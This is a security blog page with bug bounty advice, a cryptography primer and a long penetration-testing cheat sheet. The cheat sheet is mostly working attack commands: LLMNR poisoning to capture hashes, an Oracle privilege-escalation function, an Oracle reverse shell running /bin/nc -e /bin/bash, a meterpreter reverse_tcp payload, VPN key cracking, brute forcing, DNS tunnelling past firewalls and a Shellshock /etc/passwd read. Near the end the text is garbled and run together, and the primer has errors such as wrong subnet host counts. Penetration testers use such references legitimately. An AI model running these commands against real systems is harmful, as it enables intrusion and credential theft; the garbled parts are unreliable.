Tuesday, 31 March 2020

This is a collection of bug bounty reports that were submitted by security researchers in the infosec community. These write-ups are a great way to learn from fellow hackers.

Web Hacking

Hardware Hacking

#10 Rules of Bug Bounty

1.Targeting the Bug Bounty Program
How long you target the program ?
If the Answer is Just Few Hour’s or a night, Then That’s where you are doing wrong .Bug Hunting is Matter of Skill’s and Luck .Spending just few hours on program’s could be waste Because those bugs are mostly reported.You May end up getting depressed by duplicates , would suggest to at least choose any program Spend a week on it . Big Bug’s Takes time. Take your time to understand the Functionality of the application. keep writing notes and track of Suspicious endpoint’s.
Because you’re not going to earn much for known issue unless you’re very early to report. If you find out about a public program after 10/12 hours of its launching. Don’t waste your time looking for known issues or low hanging fruit .Just take a deep dive into the application.

2. How do you Approach the Target ?
if Answer is Just by Signing up at Target , Checking For Vulnerabilities like CSRF, XSS,Subdomain’s etc , Then This Could be the problem where you end up getting many duplicates or not getting any bug . would suggest to first check their documentation . Recon the Target . Understand the functionalities & privileges of the user’s in target. Recon , Check their doc’s, Information Gathering , for at least 1–2 days before start Attacking .



3. Don’t Expect Anything !
We Believe this is the most common thing bug hunter’s do After Reporting Bug’s that they expect the upcoming reward amount . Don’t Expect anything just close the report and start looking for other bug’s Because that could end up making you sad .
If you made the mindset that you are going to hunt bugs in matter of hour’s or night . this may or may not work everytime . Instead of it you could make a mindset which could be “I’m Going to Hunt Bug’s for Whole Week, Let’s just keep the target of 100$” . Believe me you will end up making 10x times target amount at the end of week and result would be happiness .
Some High severity bugs may get rewarded with low-average bounties , Don’t Shout at them,Just Ask them politely What could be the reason for bounty decision . More Importantly Be Happy and thankful to yourself of what you found .
Try to Accept this “ Sometime’s we may get unexpected rewards for small issues , We should also accept less amounts for High Severity Issue’s aswell“

4. Less Knowledge about Vulnerabilities and Testing Methodologies :
This is also common scenario lot of new bounty hunter’s start looking for bug’s without basic knowledge of how things work. What i have learned from my personal experience is you will get to know how application works until and unless you know how they build them . it is necessary first to know how application Build with Programming language before start breaking it .

5. Surround yourself with Bug Bounty Community to keep yourself Updated.
1. Create Twitter Handle and go to Hackerone Leaderboard :
2. Go to their Hackerone profile’s one by one and Follow them on twitter , Same Applies on Bugcrowd and other Platform As Well. This way you can surround yourself by Bug Hunter’s and Security Researcher’s.
3. Keep Bookmarking .
5. Join Bug Bounty World on Slack and Keep reading Their Blog’s,Tool’s,General Channel and their conversation’s of Testing And Share what you know.

6. AUTOMATION: “Automation is Power.” If you want to automate things, you need to learn “scripting”. Is highly recommended learn some programming language. Some of the Best scripting languages are: JS, PYTHON, RUBY, BASH, even knowing some curl tricks or basic bash commands scripting, you have power in your hands for automate a lot of tasks!
“Hacking is an art from your own creation” .

7. GET BOUNTY or GET EXPERIENCE: As a Bug Hunter’s, sometimes we feel sad when no bounty is received. However we always gain experience, knowledge and your skills are improved. Look bug bounty in this way and keep your motivation up day by day. A lot of our life are made by emotions, is about how you feel your life moment after moment, doing all that things thats make you happy: so! if you do bug bounties, be happy! be fun! that’s the essence of this! I remember myself everyday when i feel sadly or not motivated: hey @ak1t4 ! whats happens? Remember enjoy this!
If you don’t get bounty, you get knowledge and experience, that’s why You always win!”

8. FIND THE “BUG” or FIND A “BUG’S CHAIN”:
If you find a BUG, ask always yourself: what’s the security impact on the application? You can start hunting and have in your mind the concept of “find a bug” or you can think outside the box and start hunting with the concept of “looking the best impact”. The first concept is totally isolated, the second concept embrace a more bigger point of view.
“Stay at the valley or work hard to claim the mountain and see a big panorama.”

9. FOLLOW MASTER’S PATH: I ask myself every day how improve my skills a lot more, then i go and search for awesome hacker’s blog or the best write ups that i can find. Best hackers inspire us to be the better version of ourselves.
“My daily inspiration are those who breaks their own limits and get success. “

10. RELAX & ENJOY LIFE: The Real Success happens when you enjoy a balanced life. Your body and your mind needs an adequate rest to go beyond their own limits. If you spends a lot of hours hunting, close your laptop and go outside, to be more connected with the natural life. When you hunt with a rested mind, you can see beyond the bugs and all that important details that counts for a successful attack or PoC. Find all that gives you joy or peace, all that embrace you and improves you emotionally and mentally. Spend time with your friends and family, this life is like a Shooting Star, Enjoy that light!


Resources :

Book’s:
Burp Suite Tool Attack Approach
Browser Plugin’s :
Tool’s:
Bug Bounty References:
Payload’s:

Sunday, 9 February 2020

Cryptography Basics

Cryptography Basics













As hackers, we are often faced with the hurdle of cryptography and encryption. In some cases, we use it to hide our actions and messages. Many applications and protocols use encryption to maintain the confidentiality and integrity of data. To be able to crack passwords and encrypted protocols such as SSL and wireless, you need to at least be familiar with the concepts and terminology of cryptography and encryption.
Too many new hackers, all the concepts and terminology of cryptography can be a bit overwhelming and opaque. Cryptography is the science and art of hiding messages so that they are confidential, then “unhiding” them so that only the intended recipient can read them. Basically, we can say that cryptography is the science of secret messaging.

With this brief overview of the newcomer, I hope to lift the fog that shrouds this subject and shed a tiny bit of light on cryptography. I intend this simply to be a quick and cursory overview of cryptography for the novice hacker, not a treatise on the algorithms and mathematics of encryption. I’ll try to familiarize you with the basic terminology and concepts so that when you read about hashing, wireless cracking, or password cracking and the encryption technologies are mentioned, you have some grasp of what is being addressed.

Don’t get me wrong, I don’t intend to make you a cryptographer here (that would take years), but simply to help familiarize the beginner with the terms and concepts of cryptography so as to help you become a credible hacker.

I will attempt to use as much plain English to describe these technologies as possible, but like everything in IT, there is a very specialized language for cryptography and encryption. Terms like cipher, plaintext, ciphertext, keyspace, block size, and collisions can make studying cryptography a bit confusing and overwhelming to the beginner. I will use the term “collision,” as there really is no other word in plain English that can replace it.

Let’s get started by breaking encryption into several categories.

Types of Cryptography

There are several ways to categorize encryption, but for our purposes here, I have broken them down into four main areas.

Symmetric Encryption
Asymmetric Encryption
Hashes
Wireless
Cryptography Basics 11

A Word About Key Size

In the world of cryptography, size does matter! In general, the larger the key, the more secure the encryption. This means that AES with a 256-bit key is stronger than AES with a 128-bit key and likely will be more difficult to break. Within the same encryption algorithm, the larger the key, the stronger the encryption.

It does not necessarily mean that larger keys mean stronger encryption between encryption algorithms. Between algorithms, the strength of the encryption is dependent on both the particulars of the algorithm and the key size.

Symmetric Cryptography

Symmetric cryptography is where we have the same key at the sender and receiver. It is probably the most common form of cryptography. You have a password or key that encrypts a message and I have the same password to decrypt the message. Anyone else can’t read our message or data.

Cryptography Basics 12
Symmetric cryptography is very fast, so it is well-suited for bulk storage or streaming applications. The drawback to symmetric cryptography is what is called the key exchange. If both ends need the same key, they need to use a third channel to exchange the key and therein lies the weakness. If there are two people who want to encrypt their communication and they are 12,000 miles apart, how do they exchange the key? This key exchange then is fraught with all the problems of the confidentiality of the medium they choose, whether it be telephone, mail, email, face-to-face, etc. The key exchange can be intercepted and render the confidentiality of the encryption moot.

Some of the common symmetric algorithms that you should be familiar with are:

DES – This was one of the original and oldest encryption schemes developed by IBM. It was found to be flawed and breakable and was used in the original hashing system of LANMAN hashes in early (pre-2000) Windows systems.
3DES – This encryption algorithm was developed in response to the flaws in DES. 3DES applies the DES algorithm three times (hence the name “triple DES”) making it slightly more secure than DES.
AES – Advanced Encryption Standard is not an encryption algorithm but rather a standard developed by NIST. Presently, it is considered the strongest encryption, uses a 128-, 196-, or 256-bit key and is occupied by the Rijndael algorithm since 2001. Used in WPA2, SSL/TLS, and many other protocols where confidentiality and speed are important.
RC4 – This is streaming (it encrypts each bit or byte rather than a block of information) cipher and developed by Ronald Rivest of RSA fame. Used in VoIP and WEP.
Blowfish – The first of Bruce Schneier‘s encryption algorithms. It uses a variable key length and is very secure. It is not patented, so anyone can use it without a license.
Twofish – A stronger version of Blowfish using a 128- or 256-bit key and was a strong contender for AES. Used in Cryptcat and OpenPGP, among other places. It also is in the public domain without a patent.

Asymmetric Cryptography

Asymmetric cryptography uses different keys on both ends of the communication channel. Asymmetric cryptography is very slow, about 1,000 times slower than symmetric cryptography, so we don’t want to use it for bulk encryption or streaming communication. It does, however, solve the key exchange problem. Since we don’t need to have the same key on both ends of a communication, we don’t have the issue of key exchange.

Asymmetric cryptography is used primarily when we have two entities unknown to each other that want to exchange a small bit of information, such as a key or other identifying information, such as a certificate. It is not used for bulk or streaming-encryption due to its speed limitations.

Some of the common asymmetric encryption schemes you should be familiar with are:

Diffie-Hellman – Many people in the field of cryptography regard the Diffie-Hellman key exchange to be the greatest development in cryptography (I would have to agree). Without going deep into the mathematics, Diffie and Hellman developed a way to generate keys without having to exchange the keys, thereby solving the key exchange problem that plagues symmetric key encryption.
Cryptography Basics 13
RSA – Rivest, Shamir, and Adleman is a scheme of asymmetric encryption that uses factorization of very large prime numbers as the relationship between the two keys.
PKI – Public key infrastructure is the widely used asymmetric system for exchanging confidential information using a private key and a public key.
RSA – Rivest, Shamir, and Adleman is a scheme of asymmetric encryption that uses factorization of very large prime numbers as the relationship between the two keys.
PKI – Public key infrastructure is the widely used asymmetric system for exchanging confidential information using a private key and a public key.
Cryptography Basics 14
ECC – Elliptical curve cryptography is becoming increasingly popular in mobile computing as it is efficient, requiring less computing power and energy consumption for the same level of security. ECC relies upon the shared relationship of two functions being on the same elliptical curve.
PGP – Pretty Good Privacy uses asymmetric encryption to assure the privacy and integrity of email messages.

Hashes

Hashes are one-way encryption. A message or password is encrypted in a way that it cannot be reversed or unencrypted. You might wonder, “What good would it do us to have something encrypted and then not be able to decrypt it?” Good question!

Cryptography Basics 15
When the message is encrypted it creates a “hash” that becomes a unique, but indecipherable signature for the underlying message. Each and every message is encrypted in a way that creates a unique hash. Usually, these hashes are a fixed length (an MD5 hash is always 32 characters). In that way, the attacker can not decipher any information about the underlying message from the length of the hash. Due to this, we don’t need to know the original message, we simply need to see whether some text creates the same hash to check its integrity.

This is why hashes can be used to store passwords. The passwords are stored as hashes and then when someone tries to log in, the system hashes the password and checks to see whether the hash generated matches the hash that has been stored. In addition, hashes are useful for integrity checking, for instance with file downloads or system files.

In the world of encryption and hashing, a “collision” is where two different input texts produce the same hash. In other words, the hash is not unique. This can be an issue when we assume that all the hashes are unique such as in certificate exchanges in SSL. NSA used this property of collisions in the Stuxnet malware to provide it with what appeared to be a legitimate Microsoft certificate. Hash algorithms that produce collisions, as you might guess, are flawed and insecure.
These are the hashes you should be familiar with.

MD4 – This was an early hash by Ron Rivest and has largely been discontinued in use due to collisions.
MD5 – The most widely used hashing system. It’s 128-bit and produces a 32-character message digest.
SHA1– Developed by the NSA, it is more secure than MD5, but not as widely used. It has 160-bit digest which is usually rendered in 40-character hexadecimal. Often used for certificate exchanges in SSL, but because of recently discovered flaws, it is being deprecated for that purpose.

Wireless Cryptography

Wireless cryptography has been a favorite of Null Byte readers as so many here are trying to crack wireless access points. As you might guess, wireless cryptography is symmetric (for speed), and as with all symmetric cryptography, key exchange is critical.

WEP – This was the original encryption scheme for wireless and was quickly discovered to be flawed. It used RC4, but because of the small key size (24-bit), it repeated the IV about every 5,000 packets enabling easy cracking on a busy network.
WPA – This was a quick fix for the flaws of WEP, adding a larger key and TKIP to make it slightly more difficult to crack.
WPA2-PSK – This was the first of the more secure wireless encryption schemes. It uses a pre-shared key and AES. It then salts the hashes with the AP name or SSID. The hash is exchanged at authentication in a four-way handshake between the client and AP.
WPA2-Enterprise – This wireless encryption is the most secure. It uses a 128-bit key, AES, and a remote authentication server (RADIUS).


Pentesters Cheat Sheet


This is a quick reference high-level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high-level overview of the typical commands you would run when performing a penetration test. For more in-depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.

The focus of this cheat sheet is infrastructure/network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out the Web Application Hackers Hand Book, it is excellent for both learning and reference.

Pre-engagement

Network Configuration:

Set IP Address.
ifconfig eth0 xxx.xxx.xxx.xxx/24

Subnetting:

ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0

OSINT

Passive Information Gathering:

DNS:

WHOIS enumeration.
whois domain-name-here.com

Perform DNS IP Lookup.
dig a domain-name-here.com @nameserver

Perform MX Record Lookup.
dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG.
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers:
COMMAND DESCRIPTION:

Windows DNS zone transfer.
nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer.
dig axfr blah.com @ns1.blah.com

Email:

Simply Email:
Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.

git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi-Active Information Gathering:

Basic Finger Printing:
Manual fingerprinting / banner grabbing.

COMMAND DESCRIPTION

Basic versioning / fingerprinting via displayed banner
nc -v 192.168.1.1 25
telnet 192.168.1.1 25

Banner grabbing with NC.
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain

Active Information Gathering

DNS Bruteforce:

DNSRecon:

DNS Enumeration Kali – DNSRecon:

root:# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml

Port Scanning:

Nmap Commands:
For more commands, see the Nmap cheat sheet in another post.

Basic Nmap Commands:

COMMAND DESCRIPTION:
Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services.
nmap -v -sS -A -T4 target

As above but scans all TCP ports (takes a lot longer).
nmap -v -sS -p–A -T4 target

As above but scans all TCP ports and UDP scan (takes even longer).
nmap -v -sU -sS -p- -A -T4 target

Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover.
nmap -v -p 445 –script=smb-check-vulns
–script-args=unsafe=1 192.168.1.X

Search nmap scripts for keywords.
ls /usr/share/nmap/scripts/* | grep ftp

I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embedded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen-testing then kick off a slower scan.

Nmap UDP Scanning:
nmap -sU TARGET

UDP Protocol Scanner:
git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:
./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:
udp-proto-scanner.pl -p ntp -f ips.txt

Other Host Discovery
Other methods of host discovery, that don’t use nmap…

COMMAND DESCRIPTION
Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site.
netdiscover -r 192.168.1.0/24

Enumeration & Attacking Network Services:
Penetration testing tools that spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration:

Samba Enumeration:

SMB Enumeration Tools:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target

Also see, nbtscan cheat sheet in another post.

COMMAND DESCRIPTION:
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain.
nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain/workgroup) apart from dictionary-based share name guessing.
enum4linux -a target-ip

Fingerprint SMB Version:
smbclient -L //192.168.1.100

Find open SMB Shares:
nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users:
nmap -sU -sS –script=smb-enum-users -p U:137,T:139 192.168.11.200-254

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:
Windows:
net use \TARGETIPC$ “” /u:””

Linux:
smbclient -L //192.168.99.131

NBTScan unixwiz
Install on Kali rolling:

apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing:
Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py:
Alternatively, you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

Run Responder.py for the whole engagement
Run Responder.py for the length of the engagement while you’re working on other attack vectors.

SNMP Enumeration Tools:
A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo “” > /etc/snmp/snmp.conf

COMMAND DESCRIPTION:
SNMP enumeration.
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMPv3 Enumeration Tools
Idenitfy SNMPv3 servers with nmap:
nmap -sV -p 161 –script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the
username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

*Use Metasploits Wordlist
Metasploit’s wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler’s SecLists project on GitHub (not the mailing list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration:
This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration
RSH Run Commands:
rsh

Metasploit RSH Login Scanner:
auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users:
rusers -al 192.168.2.1

rusers scan whole Subnet:
rlogin -l

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration:
finger @TARGET-IP

Finger a Specific Username:
finger batman@TARGET-IP

Solaris bug that shows all logged in users:
finger 0@host

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger ‘a b c d e f g h’@sunhost

rwho:
Use nmap to identify machines running rwhod (513 UDP).

TLS & SSL Testing:

testssl.sh:

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html

Vulnerability Assessment:
Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:
netstat -tulpn

Login at https://127.0.0.1:9392 – credentials are generated during openvas-setup.

Database Penetration Testing:
Attacking database servers exposed on the network.

Oracle:
Install oscanner:
apt-get install oscanner

Run oscanner:
oscanner -s 192.168.1.200 -P 1521

Fingerprint Oracle TNS Version:

Install tnscmd10g:
apt-get install tnscmd10g

Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap –script=oracle-tns-version

Brute force oracle user accounts
Identify default Oracle accounts:
nmap –script=oracle-sid-brute
nmap –script=oracle-brute

Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET

Oracle Privilege Escalation:
Requirements:

-Oracle needs to be exposed on the network
-A default account is in use like Scott

A quick overview of how this works:

1 Create the function

2 Create an index on table SYS.DUAL

3 The index we just created executes our function SCOTT.DBA_X

4 The function will be executed by SYS user (as that’s the user that owns the table).
5 Create an account with DBA privileges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:
nmap –script=oracle-sid-brute
nmap –script=oracle-brute

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
begin
execute immediate ‘grant dba to user1 identified by pass1’;
commit;
return ‘FOO’;
end;

Oracle priv esc and obtain DBA access:
Run netcat:
netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA(‘BAR’));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:
drop index exploit_1337;

Get Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name => ‘MEH1337’,job_type =>
‘EXECUTABLE’,job_action => ‘/bin/nc’,number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 1, ‘TARGET-IP’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 2, ‘443’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 3, ‘-e’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 4, ‘/bin/bash’);
dbms_scheduler.enable(‘rev_shell’);
end;

MSSQL:
Enumeration / Discovery:

Nmap:
nmap -sU –script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping

*Use MS SQL Servers Browse For More:
Try using “Browse for More” via MS SQL Server Management Studio.

Bruteforce MSSQL Login:
msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network:
Plink.exe Tunnel:
PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw “1337” -R 445:127.0.0.1:445 REMOTE-IP

Pivoting:

SSH Pivoting:
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting:
TTL Finger Printing:
OPERATING SYSTEM TTL SIZE
Windows 128

Linux 64

Solaris 255

Cisco / Network 255

IPv4 Cheat Sheets:
Classful IP Ranges:
E.g Class A,B,C (depreciated)

CLASS IP ADDRESS RANGE
Class A IP Address Range 0.0.0.0 – 127.255.255.255
Class B IP Address Range 128.0.0.0 – 191.255.255.255
Class C IP Address Range 192.0.0.0 – 223.255.255.255
Class D IP Address Range 224.0.0.0 – 239.255.255.255
Class E IP Address Range 240.0.0.0 – 255.255.255.255

IPv4 Private Address Ranges:
CLASS RANGE
Class A Private Address Range 10.0.0.0 – 10.255.255.255
Class B Private Address Range 172.16.0.0 – 172.31.255.255
Class C Private Address Range 192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255

IPv4 Subnet Cheat Sheet:
Subnet cheat sheet, not really related to pen testing but a useful reference.

CIDR DECIMAL MASK NUMBER OF HOSTS
/31 255.255.255.254 1 Host
/30 255.255.255.252 2 Hosts
/29 255.255.255.249 6 Hosts
/28 255.255.255.240 4 Hosts
/27 255.255.255.224 30 Hosts
/26 255.255.255.192 62 Hosts
/25 255.255.255.128 126 Hosts
/24 255.255.255.0 254 Hosts
/23 255.255.254.0 512 Host
/22 255.255.252.0 1022 Hosts
/21 255.255.248.0 2046 Hosts
/20 255.255.240.0 4094 Hosts
/19 255.255.224.0 8190 Hosts
/18 255.255.192.0 16382 Hosts
/17 255.255.128.0 32766 Hosts
/16 255.255.0.0 65534 Hosts
/15 255.254.0.0 131070 Hosts
/14 255.252.0.0 262142 Hosts
/13 255.248.0.0 524286 Hosts
/12 255.240.0.0 1048674 Hosts
/11 255.224.0.0 2097150 Hosts
/10 255.192.0.0 4194302 Hosts
/9 255.128.0.0 8388606 Hosts
/8 255.0.0.0 16777214 Hosts

VLAN Hopping:
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh

VPN Pentesting Tools:
Identify VPN servers:
./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce:
Use IKEForce to enumerate or dictionary attack VPN servers.

Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP –id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking:
1 Identify VPN Servers
2 Enumerate with IKEForce to obtain the group ID
3 Use ike-scan to capture the PSK hash from the IKE endpoint
4 Use psk-crack to crack the hash

Step 1: Idenitfy IKE Servers
./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt

Some more advanced psk-crack options below:

pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 –charset=”01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz” 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking:
Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack:
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling:
Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine:

Installtion:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat –host

BOF / Exploit:
Exploit Research:
Find exploits for enumerated hosts / services.

COMMAND DESCRIPTION:
Search exploit-db for exploit, in this example windows 2003 + local esc.
searchsploit windows 2003 | grep -i local

Use google to search exploit-db.com for exploits
site:exploit-db.com exploit kernel <= 3 Search metasploit modules using grep - msf search sucks a bit grep -R "W7" /usr/share/metasploit-framework /modules/exploit/windows/* Searching for Exploits: Install local copy of exploit-db: searchsploit –u searchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local Compiling Windows Exploits on Kali: wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe Cross Compiling Exploits: gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit) Exploiting Common Vulnerabilities: Exploiting Shellshock: A tool to find and exploit servers vulnerable to Shellshock: git clone https://github.com/nccgroup/shocker ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c / cgi-bin/status --verbose cat file (view file contents): echo -e "HEAD /cgi-bin/status HTTP/1.1rnUser-Agent: () { :;}; echo $( 80, :DocumentRoot => Dir.pwd).start”

Run a basic PHP http server
php -S 0.0.0.0:80

Mounting File Shares:
How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION
Mount NFS share to /mnt/nfs.
mount 192.168.1.1:/vol/share /mnt/nfs

Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history).
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs

Mount a Windows share on Windows from the command line.
net use Z: \win-servershare password
/user:domainjanedoe /savecred /p:no

apt-get install smb4k -y

Install smb4k on Kali, useful Linux GUI for browsing SMB shares.

HTTP / HTTPS Web server Enumeration:
COMMAND DESCRIPTION:
Perform a nikto scan against target.
nikto -h 192.168.1.1

Configure via GUI, CLI input doesn’t work most of the time.
dirbuster

Packet Inspection:
COMMAND DESCRIPTION:
tcpdump for port 80 on interface eth0, outputs to output.pcap
tcpdump tcp port 80 -w output.pcap -i eth0

Username Enumeration:
Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration:
COMMAND DESCRIPTION:
Enumerate users from SMB.
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID cycle SMB / enumerate users from SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

SNMP User Enumeration:
COMMAND DESCRIPTION:
Enmerate users from SNMP.
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4

Enmerate users from SNMP.
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX

Search for SNMP servers with nmap, grepable output.
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)

Passwords:
Wordlists:
COMMAND DESCRIPTION:
Kali worlists.
/usr/share/wordlists

Brute Forcing Services:
Hydra FTP Brute Force.
COMMAND DESCRIPTION:
Hydra FTP brute force.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V

Hydra POP3 Brute Force:
COMMAND DESCRIPTION:
